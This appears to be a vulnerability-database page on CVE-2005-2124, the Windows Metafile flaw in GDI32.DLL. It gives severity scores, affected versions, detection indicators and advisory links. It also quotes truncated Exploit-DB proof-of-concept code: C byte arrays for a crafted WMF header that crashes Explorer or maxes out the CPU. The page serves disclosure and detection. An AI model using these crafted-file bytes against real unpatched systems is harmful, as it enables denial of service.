CVE-2005-2124
published 2005-11-29CVE-2005-2124: Unspecified vulnerability in the Graphics Rendering Engine (GDI32.DLL) in Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1, related to "An unchecked…
PriorityP258high7.6CVSS 2.0
AVNACHAuNCCICAC
EXPLOIT
EPSS
59.62%
99.0th percentile
Unspecified vulnerability in the Graphics Rendering Engine (GDI32.DLL) in Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1, related to "An unchecked buffer" and possibly buffer overflows, allows remote attackers to execute arbitrary code via a crafted Windows Metafile (WMF) format image, aka "Windows Metafile Vulnerability."
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
d7 cd c6 9a 00 00 c6 fb ca 02 aa 02 39 09 e8 03 00 00 00 00 66 a6
bytes↗
d7 cd c6 9a 00 00 c6 fb ca 02 aa 02 39 09 e8 03 00 00 00 00 66 a6
- →Crafted WMF file with oversized mtSize (0x7fffffff) and mtMaxRecord (0xffffffff) fields in the header is a strong indicator of exploit attempt; inspect WMF headers for anomalous/maximum field values. ↗
- →Crafted WMF file with mtSize and Largest record size both set to 0xffffffff causes 100% CPU utilization in Internet Explorer; detect WMF files with these fields set to maximum DWORD value. ↗
- →The vulnerability is in GDI32.DLL's Graphics Rendering Engine when processing Windows Metafile (WMF) images; monitor for rendering of WMF files from remote/untrusted sources via Explorer or Internet Explorer on unpatched systems. ↗
CVSS provenance
nvdv2.07.6HIGHAV:N/AC:H/Au:N/C:C/I:C/A:C
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-w8ch-g4f3-mw6x: Unspecified vulnerability in the Graphics Rendering Engine (GDI32
ghsa_unreviewed·2022-05-01
CVE-2005-2124 [HIGH] GHSA-w8ch-g4f3-mw6x: Unspecified vulnerability in the Graphics Rendering Engine (GDI32
Unspecified vulnerability in the Graphics Rendering Engine (GDI32.DLL) in Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1, related to "An unchecked buffer" and possibly buffer overflows, allows remote attackers to execute arbitrary code via a crafted Windows Metafile (WMF) format image, aka "Windows Metafile Vulnerability."
GHSA
GHSA-w94w-cg39-6r6h: The Windows Graphical Device Interface library (GDI32
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2005-4560 [HIGH] CWE-20 GHSA-w94w-cg39-6r6h: The Windows Graphical Device Interface library (GDI32
The Windows Graphical Device Interface library (GDI32.DLL) in Microsoft Windows allows remote attackers to execute arbitrary code via a Windows Metafile (WMF) format image with a crafted SETABORTPROC GDI Escape function call, related to the Windows Picture and Fax Viewer (SHIMGVW.DLL), a different vulnerability than CVE-2005-2123 and CVE-2005-2124, and as originally discovered in the wild on unionseek.com.
VulnCheck
Microsoft Windows Improper Input Validation
vulncheck·2005·CVSS 7.5
CVE-2005-4560 [HIGH] Microsoft Windows Improper Input Validation
Microsoft Windows Improper Input Validation
The Windows Graphical Device Interface library (GDI32.DLL) in Microsoft Windows allows remote attackers to execute arbitrary code via a Windows Metafile (WMF) format image with a crafted SETABORTPROC GDI Escape function call, related to the Windows Picture and Fax Viewer (SHIMGVW.DLL), a different vulnerability than CVE-2005-2123 and CVE-2005-2124, and as originally discovered in the wild on unionseek.com.
Affected: Microsoft Windows
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.cve.org/CVERecord?id=CVE-2005-4560; https://learn.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-001
No detection rules found.
Exploit-DB
Microsoft Windows Metafile - 'mtNoObjects' Denial of Service (MS05-053)
exploitdb·2005-11-30
CVE-2005-2124 Microsoft Windows Metafile - 'mtNoObjects' Denial of Service (MS05-053)
Microsoft Windows Metafile - 'mtNoObjects' Denial of Service (MS05-053)
---
/*
* Author: Winny Thomas
* Pune, INDIA
*
* The crafted metafile (WMF) from this code when viewed in explorer crashes it. The issue is seen
* when the field 'mtNoObjects' in the Metafile header is set to 0x0000.
* The code was tested on Windows 2000 server SP4. The issue does not occur with the
* hotfix for GDI (MS05-053) installed.
*
* Disclaimer: This code is for educational/testing purposes by authorized persons on
* networks/systems setup for such a purpose. The author of this code shall not bear
* any responsibility for any damage caused by using this code.
*
*/
#include
unsigned char wmfheader[] =
"\xd7\xcd\xc6\x9a\x00\x00\xc6\xfb\xca\x02\xaa\x02\x39\x09\xe8\x03"
"\x00\x00\x00\x00\x66\xa6"
"\x01\x00" //mt
Exploit-DB
Microsoft Windows Metafile - 'gdi32.dll' Denial of Service (MS05-053)
exploitdb·2005-11-29
CVE-2005-2124 Microsoft Windows Metafile - 'gdi32.dll' Denial of Service (MS05-053)
Microsoft Windows Metafile - 'gdi32.dll' Denial of Service (MS05-053)
---
/*
* Author: Winny Thomas
* Pune, INDIA
*
* The crafted metafile from this code when viewed in internet explorer raises the CPU utilization
* to 100%. The code was tested on Windows 2000 server SP4. The issue does not occur with the
* hotfix for GDI (MS05-053) installed
*
* Disclaimer: This code is for educational/testing purposes by authosized persons on
* networks/systems setup for such a purpose.The author of this code shall not bear
* any responsibility for any damage caused by using this code.
*
*/
#include
unsigned char wmfheader[] =
"\xd7\xcd\xc6\x9a\x00\x00\xc6\xfb\xca\x02\xaa\x02\x39\x09\xe8\x03"
"\x00\x00\x00\x00\x66\xa6"
"\x01\x00"
"\x09\x00"
"\x00\x03"
"\xff\xff\xff\xff" //Metafile file size
"\x04\x00
No writeups or analysis indexed.
http://secunia.com/advisories/17223http://secunia.com/advisories/17461http://secunia.com/advisories/17498http://securityreason.com/securityalert/161http://securitytracker.com/id?1015168http://support.avaya.com/elmodocs2/security/ASA-2005-228.pdfhttp://www.eeye.com/html/research/advisories/AD20051108a.htmlhttp://www.eeye.com/html/research/advisories/AD20051108b.htmlhttp://www.kb.cert.org/vuls/id/433341http://www.securityfocus.com/bid/15356http://www.us-cert.gov/cas/techalerts/TA05-312A.htmlhttp://www.vupen.com/english/advisories/2005/2348https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-053http://secunia.com/advisories/17223http://secunia.com/advisories/17461http://secunia.com/advisories/17498http://securityreason.com/securityalert/161http://securitytracker.com/id?1015168http://support.avaya.com/elmodocs2/security/ASA-2005-228.pdfhttp://www.eeye.com/html/research/advisories/AD20051108a.htmlhttp://www.eeye.com/html/research/advisories/AD20051108b.htmlhttp://www.kb.cert.org/vuls/id/433341http://www.securityfocus.com/bid/15356http://www.us-cert.gov/cas/techalerts/TA05-312A.htmlhttp://www.vupen.com/english/advisories/2005/2348https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-053
2005-11-29
Published